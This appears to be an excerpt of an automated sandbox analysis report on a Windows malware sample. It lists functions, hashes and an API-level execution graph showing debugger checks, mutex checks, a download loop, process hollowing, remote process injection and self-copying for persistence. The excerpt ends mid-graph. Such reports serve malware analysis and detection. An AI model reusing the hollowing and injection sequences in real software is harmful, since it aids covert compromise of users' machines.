                                                                                                                                                                                                                        • Instruction ID: 15eae2c3232f5fc9ae48acc77cda70b6da9a2d50df2b048179ada687e5b9f9d2
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ef93d6c8be03e0e8067038787ae35eedaf0d19a6d09eeffd0ee61b9360f4694
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7611EF75A5C686C5E770AF35F44836AE3A0FB84B68FA04238E69D42998DF3DD445CB10
                                                                                                                                                                                                                        Function 00007FF785311088 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1529284109.00007FF785311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF785310000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529235194.00007FF785310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529334145.00007FF785315000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529362965.00007FF785318000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529395046.00007FF785319000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529433584.00007FF78531B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff785310000_3Qv3xyyL5G.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                        • String ID: GetThreadId$kernel32
                                                                                                                                                                                                                        • API String ID: 1646373207-2383230424
                                                                                                                                                                                                                        • Opcode ID: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                        • Instruction ID: 4f2c1fb2c86ef96533d6c07be1c4f913849a643a3b9d95d99d9b59c9dad08f4e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 24E07521968A82C2D651AB70F854365A3A0FB84B69FE00539F58D42A64DF3CD559CF10
                                                                                                                                                                                                                        Function 00007FF785312F38 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 34memoryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313890: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF785313A75), ref: 00007FF7853138D9
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF785313A75), ref: 00007FF7853138EE
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF785313A75), ref: 00007FF785313901
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313890: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF785313A75), ref: 00007FF785313911
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313890: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF785313A75), ref: 00007FF785313924
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF785313A75), ref: 00007FF785313939
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF785313A75), ref: 00007FF78531394C
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF785313A75), ref: 00007FF785313961
                                                                                                                                                                                                                          • Part of subcall function 00007FF785314530: CreateFileW.KERNEL32 ref: 00007FF785314577
                                                                                                                                                                                                                          • Part of subcall function 00007FF7853110D8: OpenProcess.KERNEL32 ref: 00007FF7853110FC
                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32 ref: 00007FF785312FD3
                                                                                                                                                                                                                        • HeapFree.KERNEL32 ref: 00007FF785312FE6
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1529284109.00007FF785311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF785310000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529235194.00007FF785310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529334145.00007FF785315000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529362965.00007FF785318000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529395046.00007FF785319000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529433584.00007FF78531B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff785310000_3Qv3xyyL5G.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$CreateFileHeapProcess$AttributesDirectoryFolderFreeOpenPath
                                                                                                                                                                                                                        • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                                                                        • API String ID: 1115570603-2286007224
                                                                                                                                                                                                                        • Opcode ID: cb198f8349b0474e8430296de8ad644e8f73609a5c45828ea2168c8d2c9a5573
                                                                                                                                                                                                                        • Instruction ID: 5304fcbfa654443556bae9abf838901d772ab5940f19c299e9db013ed62e37f5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb198f8349b0474e8430296de8ad644e8f73609a5c45828ea2168c8d2c9a5573
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A611F861979B8281E610FB70F8443A6F3A1FB88B68FE00139E54C42A64DF7CE145C764

                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                        Execution Coverage:42%
                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                        Total number of Nodes:479
                                                                                                                                                                                                                        Total number of Limit Nodes:10
                                                                                                                                                                                                                        execution_graph 1447 7ff67e6d216c 1448 7ff67e6d2196 InternetOpenW 1447->1448 1449 7ff67e6d21c3 Sleep 1448->1449 1450 7ff67e6d21d0 InternetOpenUrlW 1448->1450 1449->1448 1451 7ff67e6d2207 InternetOpenUrlW 1450->1451 1452 7ff67e6d2259 HttpQueryInfoA 1450->1452 1451->1452 1455 7ff67e6d223e InternetCloseHandle Sleep 1451->1455 1453 7ff67e6d22ae 1452->1453 1454 7ff67e6d2288 InternetCloseHandle InternetCloseHandle Sleep 1452->1454 1456 7ff67e6d2315 HttpQueryInfoA GetProcessHeap RtlAllocateHeap 1453->1456 1457 7ff67e6d22b8 InternetCloseHandle InternetOpenUrlW 1453->1457 1454->1448 1455->1448 1459 7ff67e6d2394 1456->1459 1460 7ff67e6d237a InternetCloseHandle InternetCloseHandle 1456->1460 1457->1456 1458 7ff67e6d22fa InternetCloseHandle Sleep 1457->1458 1458->1448 1462 7ff67e6d239c InternetReadFile 1459->1462 1463 7ff67e6d23ea InternetCloseHandle InternetCloseHandle 1459->1463 1461 7ff67e6d2413 1460->1461 1462->1459 1462->1463 1463->1461 1356 7ff67e6d3188 1357 7ff67e6d3191 1356->1357 1358 7ff67e6d31aa 1357->1358 1361 7ff67e6d3008 1357->1361 1366 7ff67e6d2e08 CreateMutexExA 1361->1366 1364 7ff67e6d3023 Sleep CreateThread WaitForSingleObject 1365 7ff67e6d3068 SleepEx 1364->1365 1365->1357 1367 7ff67e6d2e34 ReleaseMutex CloseHandle 1366->1367 1368 7ff67e6d2e51 GetLastError 1366->1368 1369 7ff67e6d2e93 1367->1369 1370 7ff67e6d2e5e ReleaseMutex CloseHandle 1368->1370 1371 7ff67e6d2e7b ReleaseMutex CloseHandle 1368->1371 1369->1364 1369->1365 1370->1369 1371->1369 1372 7ff67e6d2ea8 CreateMutexA 1373 7ff67e6d2eea GetLastError 1372->1373 1374 7ff67e6d2ecd ReleaseMutex CloseHandle 1372->1374 1376 7ff67e6d2f14 ReleaseMutex CloseHandle 1373->1376 1377 7ff67e6d2ef7 ReleaseMutex CloseHandle 1373->1377 1375 7ff67e6d2f2c 1374->1375 1376->1375 1377->1375 1378 7ff67e6d1088 GetModuleHandleA GetProcAddress 1379 7ff67e6d10bb 1378->1379 1380 7ff67e6d3388 1383 7ff67e6d24d8 GetModuleFileNameW 1380->1383 1384 7ff67e6d2559 1383->1384 1391 7ff67e6d2554 1383->1391 1385 7ff67e6d25ad 1384->1385 1386 7ff67e6d2597 1384->1386 1426 7ff67e6d2418 ExpandEnvironmentStringsW 1385->1426 1387 7ff67e6d25a1 1386->1387 1388 7ff67e6d25cb 1386->1388 1387->1391 1428 7ff67e6d2498 ExpandEnvironmentStringsW 1387->1428 1427 7ff67e6d2458 ExpandEnvironmentStringsW 1388->1427 1392 7ff67e6d25c2 1392->1391 1394 7ff67e6d261d CreateProcessW 1392->1394 1394->1391 1395 7ff67e6d2678 CreateFileW 1394->1395 1395->1391 1396 7ff67e6d26bf GetFileSize 1395->1396 1397 7ff67e6d26dd 1396->1397 1398 7ff67e6d26e7 CloseHandle 1396->1398 1397->1398 1399 7ff67e6d26f7 VirtualAlloc 1397->1399 1398->1391 1400 7ff67e6d2731 ReadFile 1399->1400 1401 7ff67e6d2721 CloseHandle 1399->1401 1402 7ff67e6d275e VirtualFree CloseHandle 1400->1402 1403 7ff67e6d2781 CloseHandle GetThreadContext 1400->1403 1401->1391 1402->1391 1404 7ff67e6d27d1 VirtualFree 1403->1404 1405 7ff67e6d27e9 ReadProcessMemory GetModuleHandleA GetProcAddress 1403->1405 1404->1391 1406 7ff67e6d286c 1405->1406 1407 7ff67e6d2870 VirtualFree 1406->1407 1408 7ff67e6d2888 VirtualAllocEx 1406->1408 1407->1391 1409 7ff67e6d28f3 VirtualFree 1408->1409 1410 7ff67e6d290b WriteProcessMemory 1408->1410 1409->1391 1411 7ff67e6d2941 VirtualFree 1410->1411 1415 7ff67e6d2959 1410->1415 1411->1391 1412 7ff67e6d298f WriteProcessMemory 1414 7ff67e6d2a1a VirtualFree 1412->1414 1412->1415 1413 7ff67e6d2a37 1416 7ff67e6d2d28 WriteProcessMemory SetThreadContext 1413->1416 1417 7ff67e6d2aa9 RtlCompareMemory 1413->1417 1414->1391 1415->1412 1415->1413 1418 7ff67e6d2dc3 ResumeThread 1416->1418 1419 7ff67e6d2dae VirtualFree 1416->1419 1417->1413 1423 7ff67e6d2afc 1417->1423 1420 7ff67e6d2dd5 VirtualFree 1418->1420 1421 7ff67e6d2dea VirtualFree 1418->1421 1419->1391 1420->1391 1421->1391 1422 7ff67e6d2d23 1422->1416 1423->1422 1424 7ff67e6d2c2c ReadProcessMemory WriteProcessMemory 1423->1424 1424->1423 1425 7ff67e6d2d01 VirtualFree 1424->1425 1425->1391 1426->1392 1427->1392 1428->1392 1467 7ff67e6d3348 1468 7ff67e6d24d8 36 API calls 1467->1468 1469 7ff67e6d3358 1468->1469 835 7ff67e6d3418 894 7ff67e6d153c 835->894 840 7ff67e6d3430 ExitProcess 841 7ff67e6d3438 1128 7ff67e6d40b0 GetCurrentProcess OpenProcessToken 841->1128 845 7ff67e6d3453 846 7ff67e6d3468 845->846 848 7ff67e6d34b7 845->848 1143 7ff67e6d41f0 CreateMutexExA 846->1143 851 7ff67e6d34cc 848->851 852 7ff67e6d3508 848->852 850 7ff67e6d348e ExitProcess 853 7ff67e6d41f0 3 API calls 851->853 860 7ff67e6d355e 852->860 861 7ff67e6d351d 852->861 855 7ff67e6d34d8 853->855 854 7ff67e6d41f0 3 API calls 856 7ff67e6d3487 854->856 857 7ff67e6d34df ExitProcess 855->857 858 7ff67e6d34e7 855->858 856->850 859 7ff67e6d3496 856->859 1156 7ff67e6d3218 858->1156 1147 7ff67e6d32a8 859->1147 1161 7ff67e6d3a40 860->1161 865 7ff67e6d41f0 3 API calls 861->865 869 7ff67e6d3529 865->869 866 7ff67e6d34ec 870 7ff67e6d34f3 Sleep 866->870 871 7ff67e6d3500 ExitProcess 866->871 868 7ff67e6d349b 873 7ff67e6d34a2 SleepEx 868->873 874 7ff67e6d34af ExitProcess 868->874 875 7ff67e6d3530 ExitProcess 869->875 876 7ff67e6d3538 869->876 870->866 873->868 877 7ff67e6d3218 21 API calls 876->877 879 7ff67e6d353d 877->879 882 7ff67e6d3544 Sleep 879->882 883 7ff67e6d3551 ExitProcess 879->883 880 7ff67e6d35ca CreateThread CreateThread CreateThread WaitForMultipleObjects ExitProcess 881 7ff67e6d3576 884 7ff67e6d41f0 3 API calls 881->884 882->879 885 7ff67e6d3582 884->885 886 7ff67e6d359c ExitProcess 885->886 887 7ff67e6d41f0 3 API calls 885->887 888 7ff67e6d3595 887->888 888->886 889 7ff67e6d35a4 888->889 890 7ff67e6d32a8 45 API calls 889->890 891 7ff67e6d35a9 890->891 892 7ff67e6d35b0 Sleep 891->892 893 7ff67e6d35bd ExitProcess 891->893 892->891 1171 7ff67e6d149c LoadLibraryA GetProcAddress 894->1171 896 7ff67e6d15c8 1172 7ff67e6d149c LoadLibraryA GetProcAddress 896->1172 898 7ff67e6d15e2 1173 7ff67e6d14ec LoadLibraryA GetProcAddress 898->1173 900 7ff67e6d15fc 1174 7ff67e6d14ec LoadLibraryA GetProcAddress 900->1174 902 7ff67e6d1616 1175 7ff67e6d14ec LoadLibraryA GetProcAddress 902->1175 904 7ff67e6d1630 1176 7ff67e6d14ec LoadLibraryA GetProcAddress 904->1176 906 7ff67e6d164a 1177 7ff67e6d14ec LoadLibraryA GetProcAddress 906->1177 908 7ff67e6d1664 1178 7ff67e6d14ec LoadLibraryA GetProcAddress 908->1178 910 7ff67e6d167e 1179 7ff67e6d14ec LoadLibraryA GetProcAddress 910->1179 912 7ff67e6d1698 1180 7ff67e6d14ec LoadLibraryA GetProcAddress 912->1180 914 7ff67e6d16b2 1181 7ff67e6d14ec LoadLibraryA GetProcAddress 914->1181 916 7ff67e6d16cc 1182 7ff67e6d149c LoadLibraryA GetProcAddress 916->1182 918 7ff67e6d16e6 1183 7ff67e6d149c LoadLibraryA GetProcAddress 918->1183 920 7ff67e6d1700 1184 7ff67e6d149c LoadLibraryA GetProcAddress 920->1184 922 7ff67e6d171a 1185 7ff67e6d149c LoadLibraryA GetProcAddress 922->1185 924 7ff67e6d1734 1186 7ff67e6d14ec LoadLibraryA GetProcAddress 924->1186 926 7ff67e6d174e 1187 7ff67e6d14ec LoadLibraryA GetProcAddress 926->1187 928 7ff67e6d1768 1188 7ff67e6d14ec LoadLibraryA GetProcAddress 928->1188 930 7ff67e6d1782 1189 7ff67e6d14ec LoadLibraryA GetProcAddress 930->1189 932 7ff67e6d179c 1190 7ff67e6d14ec LoadLibraryA GetProcAddress 932->1190 934 7ff67e6d17b6 1191 7ff67e6d14ec LoadLibraryA GetProcAddress 934->1191 936 7ff67e6d17d0 1192 7ff67e6d14ec LoadLibraryA GetProcAddress 936->1192 938 7ff67e6d17ea 1193 7ff67e6d14ec LoadLibraryA GetProcAddress 938->1193 940 7ff67e6d1804 1194 7ff67e6d14ec LoadLibraryA GetProcAddress 940->1194 942 7ff67e6d181e 1195 7ff67e6d14ec LoadLibraryA GetProcAddress 942->1195 944 7ff67e6d1838 1196 7ff67e6d14ec LoadLibraryA GetProcAddress 944->1196 946 7ff67e6d1852 1197 7ff67e6d14ec LoadLibraryA GetProcAddress 946->1197 948 7ff67e6d186c 1198 7ff67e6d14ec LoadLibraryA GetProcAddress 948->1198 950 7ff67e6d1886 1199 7ff67e6d14ec LoadLibraryA GetProcAddress 950->1199 952 7ff67e6d18a0 1200 7ff67e6d14ec LoadLibraryA GetProcAddress 952->1200 954 7ff67e6d18ba 1201 7ff67e6d14ec LoadLibraryA GetProcAddress 954->1201 956 7ff67e6d18d4 1202 7ff67e6d14ec LoadLibraryA GetProcAddress 956->1202 958 7ff67e6d18ee 1203 7ff67e6d14ec LoadLibraryA GetProcAddress 958->1203 960 7ff67e6d1908 1204 7ff67e6d14ec LoadLibraryA GetProcAddress 960->1204 962 7ff67e6d1922 1205 7ff67e6d14ec LoadLibraryA GetProcAddress 962->1205 964 7ff67e6d193c 1206 7ff67e6d14ec LoadLibraryA GetProcAddress 964->1206 966 7ff67e6d1956 1207 7ff67e6d14ec LoadLibraryA GetProcAddress 966->1207 968 7ff67e6d1970 1208 7ff67e6d14ec LoadLibraryA GetProcAddress 968->1208 970 7ff67e6d198a 1209 7ff67e6d14ec LoadLibraryA GetProcAddress 970->1209 972 7ff67e6d19a4 1210 7ff67e6d14ec LoadLibraryA GetProcAddress 972->1210 974 7ff67e6d19be 1211 7ff67e6d14ec LoadLibraryA GetProcAddress 974->1211 976 7ff67e6d19d8 1212 7ff67e6d14ec LoadLibraryA GetProcAddress 976->1212 978 7ff67e6d19f2 1213 7ff67e6d14ec LoadLibraryA GetProcAddress 978->1213 980 7ff67e6d1a0c 1214 7ff67e6d14ec LoadLibraryA GetProcAddress 980->1214 982 7ff67e6d1a26 1215 7ff67e6d14ec LoadLibraryA GetProcAddress 982->1215 984 7ff67e6d1a40 1216 7ff67e6d14ec LoadLibraryA GetProcAddress 984->1216 986 7ff67e6d1a5a 1217 7ff67e6d14ec LoadLibraryA GetProcAddress 986->1217 988 7ff67e6d1a74 1218 7ff67e6d14ec LoadLibraryA GetProcAddress 988->1218 990 7ff67e6d1a8e 1219 7ff67e6d14ec LoadLibraryA GetProcAddress 990->1219 992 7ff67e6d1aa8 1220 7ff67e6d14ec LoadLibraryA GetProcAddress 992->1220 994 7ff67e6d1ac2 1221 7ff67e6d14ec LoadLibraryA GetProcAddress 994->1221 996 7ff67e6d1adc 1222 7ff67e6d14ec LoadLibraryA GetProcAddress 996->1222 998 7ff67e6d1af6 1223 7ff67e6d14ec LoadLibraryA GetProcAddress 998->1223 1000 7ff67e6d1b10 1224 7ff67e6d14ec LoadLibraryA GetProcAddress 1000->1224 1002 7ff67e6d1b2a 1225 7ff67e6d14ec LoadLibraryA GetProcAddress 1002->1225 1004 7ff67e6d1b44 1226 7ff67e6d14ec LoadLibraryA GetProcAddress 1004->1226 1006 7ff67e6d1b5e 1227 7ff67e6d14ec LoadLibraryA GetProcAddress 1006->1227 1008 7ff67e6d1b78 1228 7ff67e6d14ec LoadLibraryA GetProcAddress 1008->1228 1010 7ff67e6d1b92 1229 7ff67e6d14ec LoadLibraryA GetProcAddress 1010->1229 1012 7ff67e6d1bac 1230 7ff67e6d14ec LoadLibraryA GetProcAddress 1012->1230 1014 7ff67e6d1bc6 1231 7ff67e6d14ec LoadLibraryA GetProcAddress 1014->1231 1016 7ff67e6d1be0 1232 7ff67e6d14ec LoadLibraryA GetProcAddress 1016->1232 1018 7ff67e6d1bfa 1233 7ff67e6d14ec LoadLibraryA GetProcAddress 1018->1233 1020 7ff67e6d1c14 1234 7ff67e6d14ec LoadLibraryA GetProcAddress 1020->1234 1022 7ff67e6d1c2e 1235 7ff67e6d14ec LoadLibraryA GetProcAddress 1022->1235 1024 7ff67e6d1c48 1236 7ff67e6d14ec LoadLibraryA GetProcAddress 1024->1236 1026 7ff67e6d1c62 1237 7ff67e6d14ec LoadLibraryA GetProcAddress 1026->1237 1028 7ff67e6d1c7c 1238 7ff67e6d14ec LoadLibraryA GetProcAddress 1028->1238 1030 7ff67e6d1c96 1239 7ff67e6d14ec LoadLibraryA GetProcAddress 1030->1239 1032 7ff67e6d1cb0 1240 7ff67e6d14ec LoadLibraryA GetProcAddress 1032->1240 1034 7ff67e6d1cca 1241 7ff67e6d14ec LoadLibraryA GetProcAddress 1034->1241 1036 7ff67e6d1ce4 1242 7ff67e6d14ec LoadLibraryA GetProcAddress 1036->1242 1038 7ff67e6d1cfe 1243 7ff67e6d14ec LoadLibraryA GetProcAddress 1038->1243 1040 7ff67e6d1d18 1244 7ff67e6d14ec LoadLibraryA GetProcAddress 1040->1244 1042 7ff67e6d1d32 1245 7ff67e6d14ec LoadLibraryA GetProcAddress 1042->1245 1044 7ff67e6d1d4c 1246 7ff67e6d14ec LoadLibraryA GetProcAddress 1044->1246 1046 7ff67e6d1d66 1247 7ff67e6d14ec LoadLibraryA GetProcAddress 1046->1247 1048 7ff67e6d1d80 1248 7ff67e6d14ec LoadLibraryA GetProcAddress 1048->1248 1050 7ff67e6d1d9a 1249 7ff67e6d14ec LoadLibraryA GetProcAddress 1050->1249 1052 7ff67e6d1db4 1250 7ff67e6d14ec LoadLibraryA GetProcAddress 1052->1250 1054 7ff67e6d1dce 1251 7ff67e6d14ec LoadLibraryA GetProcAddress 1054->1251 1056 7ff67e6d1de8 1252 7ff67e6d14ec LoadLibraryA GetProcAddress 1056->1252 1058 7ff67e6d1e02 1253 7ff67e6d14ec LoadLibraryA GetProcAddress 1058->1253 1060 7ff67e6d1e1c 1254 7ff67e6d14ec LoadLibraryA GetProcAddress 1060->1254 1062 7ff67e6d1e36 1255 7ff67e6d14ec LoadLibraryA GetProcAddress 1062->1255 1064 7ff67e6d1e50 1256 7ff67e6d14ec LoadLibraryA GetProcAddress 1064->1256 1066 7ff67e6d1e6a 1257 7ff67e6d14ec LoadLibraryA GetProcAddress 1066->1257 1068 7ff67e6d1e84 1258 7ff67e6d14ec LoadLibraryA GetProcAddress 1068->1258 1070 7ff67e6d1e9e 1259 7ff67e6d14ec LoadLibraryA GetProcAddress 1070->1259 1072 7ff67e6d1eb8 1260 7ff67e6d14ec LoadLibraryA GetProcAddress 1072->1260 1074 7ff67e6d1ed2 1261 7ff67e6d14ec LoadLibraryA GetProcAddress 1074->1261 1076 7ff67e6d1eec 1262 7ff67e6d14ec LoadLibraryA GetProcAddress 1076->1262 1078 7ff67e6d1f06 1263 7ff67e6d14ec LoadLibraryA GetProcAddress 1078->1263 1080 7ff67e6d1f20 1264 7ff67e6d14ec LoadLibraryA GetProcAddress 1080->1264 1082 7ff67e6d1f3a 1265 7ff67e6d14ec LoadLibraryA GetProcAddress 1082->1265 1084 7ff67e6d1f54 1266 7ff67e6d14ec LoadLibraryA GetProcAddress 1084->1266 1086 7ff67e6d1f6e 1267 7ff67e6d14ec LoadLibraryA GetProcAddress 1086->1267 1088 7ff67e6d1f88 1268 7ff67e6d14ec LoadLibraryA GetProcAddress 1088->1268 1090 7ff67e6d1fa2 1269 7ff67e6d14ec LoadLibraryA GetProcAddress 1090->1269 1092 7ff67e6d1fbc 1270 7ff67e6d149c LoadLibraryA GetProcAddress 1092->1270 1094 7ff67e6d1fd6 1271 7ff67e6d14ec LoadLibraryA GetProcAddress 1094->1271 1096 7ff67e6d1ff0 1272 7ff67e6d14ec LoadLibraryA GetProcAddress 1096->1272 1098 7ff67e6d200a 1273 7ff67e6d14ec LoadLibraryA GetProcAddress 1098->1273 1100 7ff67e6d2024 1274 7ff67e6d14ec LoadLibraryA GetProcAddress 1100->1274 1102 7ff67e6d203e 1275 7ff67e6d14ec LoadLibraryA GetProcAddress 1102->1275 1104 7ff67e6d2058 1276 7ff67e6d14ec LoadLibraryA GetProcAddress 1104->1276 1106 7ff67e6d2072 1277 7ff67e6d14ec LoadLibraryA GetProcAddress 1106->1277 1108 7ff67e6d208c 1278 7ff67e6d149c LoadLibraryA GetProcAddress 1108->1278 1110 7ff67e6d20a6 1279 7ff67e6d149c LoadLibraryA GetProcAddress 1110->1279 1112 7ff67e6d20c0 1280 7ff67e6d14ec LoadLibraryA GetProcAddress 1112->1280 1114 7ff67e6d20da 1281 7ff67e6d14ec LoadLibraryA GetProcAddress 1114->1281 1116 7ff67e6d20f4 1282 7ff67e6d14ec LoadLibraryA GetProcAddress 1116->1282 1118 7ff67e6d210e 1283 7ff67e6d14ec LoadLibraryA GetProcAddress 1118->1283 1120 7ff67e6d2128 1284 7ff67e6d14ec LoadLibraryA GetProcAddress 1120->1284 1122 7ff67e6d2142 1285 7ff67e6d14ec LoadLibraryA GetProcAddress 1122->1285 1124 7ff67e6d215c 1125 7ff67e6d31b8 IsDebuggerPresent 1124->1125 1126 7ff67e6d31ca GetCurrentProcess CheckRemoteDebuggerPresent 1125->1126 1127 7ff67e6d31c6 1125->1127 1126->1127 1127->840 1127->841 1129 7ff67e6d343d 1128->1129 1130 7ff67e6d40d6 GetTokenInformation 1128->1130 1139 7ff67e6d3cb0 GetModuleFileNameW 1129->1139 1286 7ff67e6d3b20 VirtualAlloc 1130->1286 1132 7ff67e6d4107 GetTokenInformation 1133 7ff67e6d4134 CloseHandle 1132->1133 1134 7ff67e6d414e AdjustTokenPrivileges CloseHandle 1132->1134 1135 7ff67e6d3af0 VirtualFree 1133->1135 1287 7ff67e6d3af0 1134->1287 1136 7ff67e6d4149 1135->1136 1136->1129 1140 7ff67e6d3d9e wcsncpy 1139->1140 1141 7ff67e6d3cdb PathFindFileNameW wcslen 1139->1141 1142 7ff67e6d3d15 1140->1142 1141->1142 1142->845 1144 7ff67e6d421c GetLastError 1143->1144 1145 7ff67e6d3474 1143->1145 1144->1145 1146 7ff67e6d4229 CloseHandle 1144->1146 1145->850 1145->854 1146->1145 1290 7ff67e6d3890 1147->1290 1149 7ff67e6d32b9 1293 7ff67e6d4530 CreateFileW 1149->1293 1151 7ff67e6d3313 CreateThread 1151->868 1152 7ff67e6d32d1 1152->1151 1305 7ff67e6d4090 1152->1305 1157 7ff67e6d3890 11 API calls 1156->1157 1158 7ff67e6d3228 1157->1158 1341 7ff67e6d4300 CreateFileW 1158->1341 1162 7ff67e6d3710 3 API calls 1161->1162 1163 7ff67e6d3a6b 1162->1163 1164 7ff67e6d3890 11 API calls 1163->1164 1165 7ff67e6d3a75 GetModuleFileNameW DeleteFileW CopyFileW 1164->1165 1166 7ff67e6d3ab7 SetFileAttributesW 1165->1166 1167 7ff67e6d3563 1165->1167 1353 7ff67e6d3980 RegOpenKeyExW 1166->1353 1169 7ff67e6d33a8 GetVersionExW 1167->1169 1170 7ff67e6d33d9 1169->1170 1170->880 1170->881 1171->896 1172->898 1173->900 1174->902 1175->904 1176->906 1177->908 1178->910 1179->912 1180->914 1181->916 1182->918 1183->920 1184->922 1185->924 1186->926 1187->928 1188->930 1189->932 1190->934 1191->936 1192->938 1193->940 1194->942 1195->944 1196->946 1197->948 1198->950 1199->952 1200->954 1201->956 1202->958 1203->960 1204->962 1205->964 1206->966 1207->968 1208->970 1209->972 1210->974 1211->976 1212->978 1213->980 1214->982 1215->984 1216->986 1217->988 1218->990 1219->992 1220->994 1221->996 1222->998 1223->1000 1224->1002 1225->1004 1226->1006 1227->1008 1228->1010 1229->1012 1230->1014 1231->1016 1232->1018 1233->1020 1234->1022 1235->1024 1236->1026 1237->1028 1238->1030 1239->1032 1240->1034 1241->1036 1242->1038 1243->1040 1244->1042 1245->1044 1246->1046 1247->1048 1248->1050 1249->1052 1250->1054 1251->1056 1252->1058 1253->1060 1254->1062 1255->1064 1256->1066 1257->1068 1258->1070 1259->1072 1260->1074 1261->1076 1262->1078 1263->1080 1264->1082 1265->1084 1266->1086 1267->1088 1268->1090 1269->1092 1270->1094 1271->1096 1272->1098 1273->1100 1274->1102 1275->1104 1276->1106 1277->1108 1278->1110 1279->1112 1280->1114 1281->1116 1282->1118 1283->1120 1284->1122 1285->1124 1286->1132 1288 7ff67e6d3b14 1287->1288 1289 7ff67e6d3b01 VirtualFree 1287->1289 1288->1129 1289->1288 1325 7ff67e6d3710 GetWindowsDirectoryW 1290->1325 1292 7ff67e6d38bf 8 API calls 1292->1149 1294 7ff67e6d4591 GetFileSize GetProcessHeap RtlAllocateHeap 1293->1294 1295 7ff67e6d458a 1293->1295 1296 7ff67e6d45da CloseHandle 1294->1296 1297 7ff67e6d45ec ReadFile 1294->1297 1295->1152 1296->1295 1298 7ff67e6d4613 GetProcessHeap HeapFree CloseHandle 1297->1298 1299 7ff67e6d463b 1297->1299 1298->1295 1300 7ff67e6d4654 GetProcessHeap HeapFree CloseHandle 1299->1300 1302 7ff67e6d467c 1299->1302 1300->1295 1301 7ff67e6d47e7 GetProcessHeap RtlFreeHeap CloseHandle 1301->1295 1302->1301 1303 7ff67e6d4737 GetProcessHeap RtlAllocateHeap 1302->1303 1304 7ff67e6d4780 1303->1304 1304->1301 1330 7ff67e6d3fd0 CreateToolhelp32Snapshot 1305->1330 1308 7ff67e6d10d8 OpenProcess 1309 7ff67e6d111f 1308->1309 1313 7ff67e6d1115 1308->1313 1337 7ff67e6d13c4 GetModuleHandleA GetProcAddress 1309->1337 1311 7ff67e6d112c 1312 7ff67e6d11fe VirtualAllocEx 1311->1312 1311->1313 1312->1313 1314 7ff67e6d124f WriteProcessMemory 1312->1314 1313->1151 1314->1313 1315 7ff67e6d1286 WriteProcessMemory 1314->1315 1315->1313 1316 7ff67e6d12d1 1315->1316 1339 7ff67e6d1444 GetSystemInfo 1316->1339 1319 7ff67e6d12fe GetModuleHandleA GetProcAddress 1319->1313 1320 7ff67e6d1338 